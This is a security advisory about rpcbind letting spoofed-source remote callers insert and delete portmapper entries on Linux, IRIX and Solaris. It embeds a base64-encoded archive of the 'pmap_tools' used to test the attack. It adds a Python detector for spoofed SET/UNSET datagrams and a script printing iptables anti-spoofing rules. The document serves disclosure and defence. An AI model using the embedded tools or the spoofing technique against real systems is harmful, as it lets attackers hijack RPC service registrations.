COMMAND

    rpcbind

SYSTEMS AFFECTED

    Linux (2.0.34), IRIX 6.2, 6.5.2f, 6.5.3f, Wietse's rpcbind 2.1 replacement, Solaris 2.6 (others?)

PROBLEM

    Martin Rosa found the following.  Rpcbind permits a remote attacker
    to insert and delete entries without superuser status by spoofing a
    source address: rpcbind decides whether to honour a SET or UNSET
    request from the caller's IP address alone, so a forged source
    address is all that is needed.  Ironically, it inserts the entries
    as being owned by superuser (Wietse's rpcbind in this case).  The
    consequences are terrible, to say the least.  Tests were conducted
    with the pmap_tools available at the address below.  A source of
    pmap_tools for Linux, as well as technical details concerning this
    advisory, can be obtained here:

        http://www.pgci.ca/emain.html

    Below you will find the MIME-encoded version of it (pmap_tools.gz, base64).

    ---
    Content-Type: application/octet-stream; name="pmap_tools.gz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="pmap_tools.gz"
    Content-MD5: Hi3VxJoDKcttaTFHFvNMCw==

    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

    -----
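    As an added illustration of the failure mode described in the PROBLEM
    section (this is new example code, not part of the advisory and not part
    of pmap_tools), the following Python detector parses UDP datagrams sent
    to rpcbind and flags PMAPPROC_SET / PMAPPROC_UNSET calls whose source
    address is loopback or an inside network but which arrived on the
    outside interface, which is exactly the spoofed traffic the advisory
    relies on.  The interface name eth0, the inside network 192.0.2.0/24
    and the sample datagrams are constructed assumptions; the RPC header and
    portmapper argument layouts follow RFC 1057.

```python
"""Detect portmapper SET/UNSET calls whose source address is spoofed.

Added example (not from the advisory): classify UDP datagrams aimed at
rpcbind (port 111) and flag PMAPPROC_SET / PMAPPROC_UNSET calls that
claim a loopback or local-net source yet arrived on the outside interface.
"""
import ipaddress
import struct
from dataclasses import dataclass

PMAP_PROG = 100000          # portmapper program number
PMAP_PORT = 111
PMAPPROC_SET = 1            # register a (prog, vers, prot, port) mapping
PMAPPROC_UNSET = 2          # remove a mapping
PMAPPROC_GETPORT = 3        # read-only lookup, harmless
MUTATING = {PMAPPROC_SET: "SET", PMAPPROC_UNSET: "UNSET"}

# Assumed site layout (hypothetical): eth0 faces the border router and
# 192.0.2.0/24 is the only inside network that rpcbind trusts.
EXTERNAL_IFACE = "eth0"
LOOPBACK = ipaddress.ip_network("127.0.0.0/8")
LOCAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]


@dataclass
class RpcCall:
    xid: int
    prog: int
    vers: int
    proc: int
    args: bytes


def parse_rpc_call(payload: bytes):
    """Parse an ONC RPC v2 CALL header (RFC 1057) and skip the opaque cred/verf."""
    if len(payload) < 24:
        return None
    xid, msg_type, rpcvers, prog, vers, proc = struct.unpack("!6I", payload[:24])
    if msg_type != 0 or rpcvers != 2:        # msg_type 0 == CALL
        return None
    off = 24
    for _ in range(2):                       # credentials, then verifier
        if len(payload) < off + 8:
            return None
        _flavor, length = struct.unpack("!II", payload[off:off + 8])
        off += 8 + ((length + 3) & ~3)       # XDR pads opaque data to 4 bytes
    if len(payload) < off:
        return None
    return RpcCall(xid, prog, vers, proc, payload[off:])


def parse_mapping(args: bytes):
    """Decode the struct mapping {prog, vers, prot, port} argument."""
    if len(args) < 16:
        return None
    prog, vers, prot, port = struct.unpack("!4I", args[:16])
    return {"prog": prog, "vers": vers, "prot": prot, "port": port}


def claims_trusted_source(src: str) -> bool:
    """True if rpcbind would accept SET/UNSET from this address unchecked."""
    ip = ipaddress.ip_address(src)
    return ip in LOOPBACK or any(ip in net for net in LOCAL_NETS)


def check_datagram(iface: str, src: str, dst_port: int, payload: bytes):
    """Return an alert dict for a spoofed SET/UNSET, else None."""
    if dst_port != PMAP_PORT:
        return None
    call = parse_rpc_call(payload)
    if call is None or call.prog != PMAP_PROG or call.proc not in MUTATING:
        return None
    # A genuinely outside address is refused by rpcbind's own check; the
    # dangerous case is a loopback/local-net source that came in from outside.
    if iface == EXTERNAL_IFACE and claims_trusted_source(src):
        m = parse_mapping(call.args) or {}
        return {"xid": call.xid, "src": src, "proc": MUTATING[call.proc],
                "prog": m.get("prog"), "port": m.get("port")}
    return None


def build_pmap_call(xid, proc, prog, vers, prot, port) -> bytes:
    """Constructed test datagram: CALL header, AUTH_NULL cred/verf, mapping args."""
    header = struct.pack("!6I", xid, 0, 2, PMAP_PROG, 2, proc)
    auth_null = struct.pack("!II", 0, 0) * 2
    return header + auth_null + struct.pack("!4I", prog, vers, prot, port)


# Constructed capture: (interface, source IP, destination port, UDP payload)
SAMPLE_DATAGRAMS = [
    ("eth0", "127.0.0.1",    111, build_pmap_call(1, PMAPPROC_SET,     100005, 1, 17, 2049)),
    ("lo",   "127.0.0.1",    111, build_pmap_call(2, PMAPPROC_SET,     100005, 1, 17, 2049)),
    ("eth0", "192.0.2.7",    111, build_pmap_call(3, PMAPPROC_UNSET,   100003, 2, 17, 2049)),
    ("eth0", "198.51.100.9", 111, build_pmap_call(4, PMAPPROC_SET,     100003, 2, 17, 2049)),
    ("eth0", "127.0.0.1",    111, build_pmap_call(5, PMAPPROC_GETPORT, 100003, 2, 17, 0)),
]


def scan(datagrams):
    """Run the check over a capture and return the list of alerts."""
    return [a for a in (check_datagram(*d) for d in datagrams) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_DATAGRAMS):
        print(alert)
```

    Run stand-alone it reports two alerts from the constructed capture: the
    loopback-sourced SET and the inside-net-sourced UNSET that both arrived on
    eth0.  The genuine registration on lo, the SET from a real outside
    address (which rpcbind itself refuses) and the read-only GETPORT are left
    alone.  In practice the tuples would come from a capture on the outside
    interface, and the same rule applies to any service that authorises
    callers by source address alone.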

SOLUTION

    Make sure you filter 127.0.0.1 and local nets at your border router,
    so that a packet arriving from outside can never carry a loopback or
    internal source address.  Bad router hygiene will lead to problems.
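    Added example (not from the advisory) of the ingress filtering the
    SOLUTION asks for, written for a Linux box acting as the border router or
    as the host firewall in front of rpcbind.  The interface name eth0 and
    the inside networks are assumed values; the function prints the iptables
    rules instead of applying them so they can be reviewed first.

```shell
#!/bin/sh
# Added example, not part of the advisory: emit anti-spoofing ingress rules.
# EXT_IF is the interface facing the outside world; LOCAL_NETS lists the
# inside networks that rpcbind trusts.  Both are assumed sample values.
EXT_IF="${EXT_IF:-eth0}"
LOCAL_NETS="${LOCAL_NETS:-192.0.2.0/24 198.51.100.0/24}"

# antispoof_rules IFACE NET...  -> prints one iptables command per line.
# Packets entering IFACE with a loopback or inside-net source are dropped
# whether they are addressed to this box (INPUT) or routed through it
# (FORWARD); the OUTPUT rule keeps this box from emitting such packets.
antispoof_rules() {
    ext_if="$1"
    shift
    echo "iptables -A INPUT   -i $ext_if -s 127.0.0.0/8 -j DROP"
    echo "iptables -A FORWARD -i $ext_if -s 127.0.0.0/8 -j DROP"
    for net in "$@"; do
        echo "iptables -A INPUT   -i $ext_if -s $net -j DROP"
        echo "iptables -A FORWARD -i $ext_if -s $net -j DROP"
    done
    echo "iptables -A OUTPUT  -o $ext_if -s 127.0.0.0/8 -j DROP"
}

# Word-splitting of LOCAL_NETS is intended: one argument per network.
antispoof_rules "$EXT_IF" $LOCAL_NETS
```

    Pipe the output into sh once it has been checked.  On a Linux host the
    kernel's reverse-path filter (net.ipv4.conf.all.rp_filter=1) is a useful
    complement, but it does not replace the border-router filter the
    advisory calls for, because a spoofed packet still reaches every host on
    the inside segment if the router lets it through.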